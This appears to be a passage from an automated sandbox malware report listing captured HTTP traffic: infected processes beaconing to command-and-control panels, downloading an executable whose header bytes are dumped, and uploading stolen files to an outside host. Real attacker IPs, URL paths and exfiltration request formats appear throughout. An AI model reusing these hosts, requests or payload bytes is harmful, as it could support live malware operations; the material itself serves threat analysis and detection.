                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.236985922 CET1236INData Raw: bb e9 10 e3 7a 7b 60 15 5a 4e df d8 86 42 41 f0 75 5a b8 1f ed a4 73 e9 54 c4 57 c2 7b 28 43 8f 37 dc cf e7 2a 1c 27 a3 7e 27 3f 99 ca 45 2e f7 1a 14 03 63 8e 46 f2 74 35 15 93 13 7d fb 40 f4 ca a8 8c 28 d2 67 fc ef 44 db a2 99 0a 15 eb 2d 45 c7
                                                                                                                                                                                                                                                          Data Ascii: z{`ZNBAuZsTW{(C7*'~'?E.cFt5}@(gD-E;g3^/1nd]uPW7DOv{BC@vt@>7>VC4jjV#_~@#xHR80j_0@rcA;t<+{*JN;yE2JLV\hD)@o[=~HR>M
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.236999035 CET1236INData Raw: cb e8 0a b3 08 d0 d0 d9 62 fc 1c 62 b3 57 dd 57 ea ea a4 47 45 ab 7c db c5 31 43 4f d6 9c c3 9c fa 4a 8b 2b 14 7c 58 60 d4 0e 77 2c 1d 28 e3 d3 66 cb c0 35 7c db 5d 9e 92 2a 22 6c 78 f4 dc 88 2a e8 56 33 6a 8c 66 f9 b6 df 41 4b 9a 6f bc c3 c0 c5
                                                                                                                                                                                                                                                          Data Ascii: bbWWGE|1COJ+|X`w,(f5|]*"lx*V3jfAKoXQW,AH<nl9dt=b:(Q+~ll(B\!Ew~Wd'zyab{pkT&$6me*/u2tc~~^
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.237010956 CET776INData Raw: 4e 13 7a b7 33 0d 7f d5 3e 27 f8 1d 45 45 1b ee b3 bf ce fc ef 98 15 53 1b 42 0a 4f 22 1a 1b 96 09 65 51 92 3e 4f ae 38 22 f5 5c ce 5b c0 b5 d9 c8 8c 7a ae c0 2f dd 33 05 7c cc 9a d9 78 8e af c0 3d 39 0a c5 c0 bc cf 63 c9 38 c9 32 39 76 d5 ae 08
                                                                                                                                                                                                                                                          Data Ascii: Nz3>'EESBO"eQ>O8"\[z/3|x=9c829v9w*j tg#F8u+U*E;To9Gh_*oW5yv'nnQ<mW[E2;~;Y|x&(2Y|FuZ*2cyoHT0p%'3Tlh
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.237024069 CET1236INData Raw: 19 d7 c1 08 58 e9 25 dd 32 b5 b7 00 8e 0a 85 dc db 67 bc 2f cd 2b 34 84 67 1e 46 ac ad 96 a0 58 08 2a 8c 9d 19 48 8a 33 66 22 0e 4d b1 04 8c f1 20 ef 84 83 d5 17 93 d9 ee 43 94 d1 91 cc 1c c1 9e 41 b9 99 dc 17 5e f0 73 19 fa 5f 2b 91 78 43 9c 1b
                                                                                                                                                                                                                                                          Data Ascii: X%2g/+4gFX*H3f"M CA^s_+xC%cOvY?xI)VUX^KQAF;JL,Ny;QX-KP%o?DhF^gXrA-VBj(:gPjf8jh%kkRzNnH.W~@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.237657070 CET1236INData Raw: b7 49 81 3f e6 ab 20 5a a7 d6 58 a3 d7 c9 34 28 23 7a e8 b5 4f 7c e4 03 66 3e 9d f1 1d 3a b2 a0 62 f3 e4 c9 ba 94 44 83 e7 ab 77 64 46 eb a3 d1 43 94 f9 f2 70 b8 f8 a2 6a 4a b2 d7 2d 35 98 67 2d 45 3d ab 7b cc 0c 1f f8 22 e1 23 52 ac 01 56 d0 5c
                                                                                                                                                                                                                                                          Data Ascii: I? ZX4(#zO|f>:bDwdFCpjJ-5g-E={"#RV\tw~!xh_b/jv,,c'6<P\`+?>wJ%GgD_<c|kkyQ@{AhP[HTo?3Js,
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.237669945 CET1236INData Raw: 04 a0 38 c3 26 3c b0 95 6a 41 bc 10 4c f8 68 c3 6b 82 6b 98 d8 20 f5 07 7c c5 e6 fc 71 6f 8a b6 00 2e 71 ee 61 1c 82 37 32 56 bc f7 e6 ae aa d0 f2 98 e8 1f a6 10 36 96 0c e7 aa 12 8c be 7c 8f aa 9d f8 25 a6 3a e2 01 66 9d 5a 87 54 4b 2a 37 5f d5
                                                                                                                                                                                                                                                          Data Ascii: 8&<jALhkk |qo.qa72V6|%:fZTK*7_H8xu:Y;cWJzHYNbwcW~!jmajvUBPgRWmx(|EOD~D$ROBX-1OT)8n5DFv>%RZk
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:02.356497049 CET1236INData Raw: 36 64 16 a1 cd 5c d8 7f cb 32 01 d8 4b 55 3b 23 12 d9 1c 65 bb 82 a1 11 5a 84 bc 1a 3d a7 56 7e 9b 4f 01 dd 97 d9 17 0f 52 9c f5 8e 01 ab 2b 2b 00 8e 90 d0 1c d0 4d d6 f0 fe 03 df b3 18 3b 8a 3e 33 a1 11 97 0d 34 9e 65 d1 2e 85 f4 63 a1 10 63 9c
                                                                                                                                                                                                                                                          Data Ascii: 6d\2KU;#eZ=V~OR++M;>34e.cc!twKPtab67jq+2#=ob21QvtJtjI>S3/hV)Vx(d (B<srE{stY2%Zw*pet|HGgt/xgiP


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          16192.168.2.449809185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:03.214940071 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017627001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:04.555649042 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:04 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          17192.168.2.44981331.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:04.678136110 CET59OUTGET /files/dodo/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.005508900 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:05 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 765568
                                                                                                                                                                                                                                                          Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "67614868-bae80"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bss`@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.005645037 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.005772114 CET448INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                                                                                                                          Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.005791903 CET1236INData Raw: 00 02 00 00 31 c9 88 8c 0c 00 01 00 00 89 c8 99 f7 fe 8a 04 17 88 04 0c 41 81 f9 00 01 00 00 75 e5 31 c0 31 c9 8a 94 04 00 01 00 00 00 d1 02 0c 04 0f b6 f1 8a b4 34 00 01 00 00 88 b4 04 00 01 00 00 88 94 34 00 01 00 00 40 3d 00 01 00 00 75 d4 83
                                                                                                                                                                                                                                                          Data Ascii: 1Au1144@=u$1111QQQ(9BCIuhMBheB~P:C$09G9$
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.006100893 CET1236INData Raw: c4 0c 01 e7 83 c7 10 eb 4b 89 f9 83 c9 0f 83 f9 17 be 16 00 00 00 0f 43 f1 8d 46 01 81 f9 ff 0f 00 00 72 08 50 e8 0f 01 00 00 eb 06 50 e8 ef 11 00 00 83 c4 04 89 c3 89 44 24 10 89 7c 24 20 89 74 24 24 57 55 50 e8 c4 5f 00 00 83 c4 0c 01 df 8d 5c
                                                                                                                                                                                                                                                          Data Ascii: KCFrPPD$|$ t$$WUP_\$h5SmD$$r1L$prQ) $VQTWuED$D$E$(L$I!UW49BD$$4$t$
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.006112099 CET448INData Raw: 51 e8 8c 44 00 00 83 c4 08 c7 06 88 c3 41 00 f2 0f 10 47 0c f2 0f 11 46 0c 89 f0 5e 5f c2 04 00 cc 56 89 ce 8b 44 24 08 c7 01 28 c1 41 00 83 c1 04 31 d2 89 56 08 89 56 04 83 c0 04 51 50 e8 4f 44 00 00 83 c4 08 c7 06 a8 c3 41 00 89 f0 5e c2 04 00
                                                                                                                                                                                                                                                          Data Ascii: QDAGF^_VD$(A1VVQPODA^xdBdBd,;`VBhxdBP=xdBuh@hxdB|V|$tV^BUSWVPt$D$uJWFFj \
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.006122112 CET1236INData Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89
                                                                                                                                                                                                                                                          Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.006131887 CET1236INData Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64
                                                                                                                                                                                                                                                          Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.006694078 CET1236INData Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1
                                                                                                                                                                                                                                                          Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.006705046 CET1236INData Raw: 7d 00 00 59 85 c0 75 0f 68 ac 64 42 00 e8 d8 7d 00 00 59 85 c0 74 2b 32 c0 eb 30 83 c9 ff 89 0d a0 64 42 00 89 0d a4 64 42 00 89 0d a8 64 42 00 89 0d ac 64 42 00 89 0d b0 64 42 00 89 0d b4 64 42 00 c6 05 9d 64 42 00 01 b0 01 5e 5d c3 6a 05 e8 8a
                                                                                                                                                                                                                                                          Data Ascii: }YuhdB}Yt+20dBdBdBdBdBdBdB^]j#UEVH<AQAk(J9MrB9Er(;u3^]UEVu}kdBP$Y^]x}kdBP$Y3W@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:06.125097990 CET1236INData Raw: ac 65 42 00 e8 ad ff ff ff 83 25 ac 65 42 00 00 59 8d 4d fc e8 dc fb ff ff c9 c3 55 8b ec 8b 4d 08 b8 d8 c8 41 00 39 08 74 11 83 c0 08 3d 50 cb 41 00 75 f2 b8 24 07 42 00 5d c3 8b 40 04 5d c3 55 8b ec 51 51 8b 45 08 56 8b f1 89 45 f8 8d 45 f8 c6
                                                                                                                                                                                                                                                          Data Ascii: eB%eBYMUMA9t=PAu$B]@]UQQEVEEEV(A"bRP/YY^aaABAA(API/YUMhBBEP(UMuwhBBEP(UMuhCBE


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          18192.168.2.449822185.215.113.206805932C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:07.575882912 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ
                                                                                                                                                                                                                                                          Host: 185.215.113.206
                                                                                                                                                                                                                                                          Content-Length: 272
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 63 37 61 34 34 63 38 66 35 30 32 30 31 63 63 30 62 39 33 66 38 61 37 33 66 31 36 36 65 62 31 63 35 39 32 66 38 66 30 36 38 63 36 36 64 62 39 36 36 33 64 30 38 66 64 65 37 66 38 61 64 63 65 65 66 66 31 35 64 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"5c7a44c8f50201cc0b93f8a73f166eb1c592f8f068c66db9663d08fde7f8adceeff15d0f------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DAFIEHIEGDHIDGDGHDHJ--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:09.474658012 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:08 GMT
                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          19192.168.2.449828185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:10.138797045 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017628001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:11.498018026 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:11 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          20192.168.2.449835185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:13.302066088 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:14.661355972 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:14 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          21192.168.2.449842176.53.146.212806440C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:15.353072882 CET642OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                          Host: fivetk5vt.top
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 463
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------VrpZkuoWC6a4vg7Q6mctZT
                                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 72 70 5a 6b 75 6f 57 43 36 61 34 76 67 37 51 36 6d 63 74 5a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 69 7a 61 6e 69 6b 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 21 7b da 9e 24 11 e5 87 20 5d 19 cf 4c c9 b6 b6 0b 5e f3 26 fb d7 ba 4b 62 3a df c1 bc b3 97 c7 ce bb d8 6b cc 44 d4 b4 a6 b1 fc 8a 76 f8 0a 85 39 df 2c 13 cb 3d 0a 6a d0 98 b3 28 43 f4 1b ef 05 10 67 a1 9a 35 60 da e3 85 48 ce 89 4d 13 48 47 f6 cb 9f 5c 48 f0 09 6b ed 26 6d cc 1a 00 fe d1 6d 03 13 16 1a 2e 2f 7b b8 89 ae a2 f2 8f 2e 0f ed 39 b0 89 21 f1 b5 b8 a7 ec 62 09 96 67 1c e8 cb 34 b5 1c 77 8a 02 fb 64 e2 58 85 c4 a7 fd 24 d6 0b 0d 43 b7 9b fa 80 99 e2 7e b1 5f 4e dc d7 dd 01 e9 21 d9 a0 59 32 f9 45 f6 ef b2 03 91 97 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: --------------------------VrpZkuoWC6a4vg7Q6mctZTContent-Disposition: form-data; name="file"; filename="Wizanik.bin"Content-Type: application/octet-stream!{$ ]L^&Kb:kDv9,=j(Cg5`HMHG\Hk&mm./{.9!bg4wdX$C~_N!Y2EgNxlHr21b2\9'|M|lUg<wZl@n>QH--------------------------VrpZkuoWC6a4vg7Q6mctZT--
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:16.736171007 CET255INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          server: nginx
                                                                                                                                                                                                                                                          date: Thu, 19 Dec 2024 13:21:16 GMT
                                                                                                                                                                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                                                                          x-ratelimit-limit: 30
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 26
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1734615673
                                                                                                                                                                                                                                                          etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                          Data Raw: 4f 4b
                                                                                                                                                                                                                                                          Data Ascii: OK


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          22192.168.2.449847185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:16.320318937 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:17.664916039 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          23192.168.2.449851176.53.146.212806440C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:18.135180950 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                          Host: fivetk5vt.top
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 84517
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------p7i7u3jGe3SOdObRymfEtU
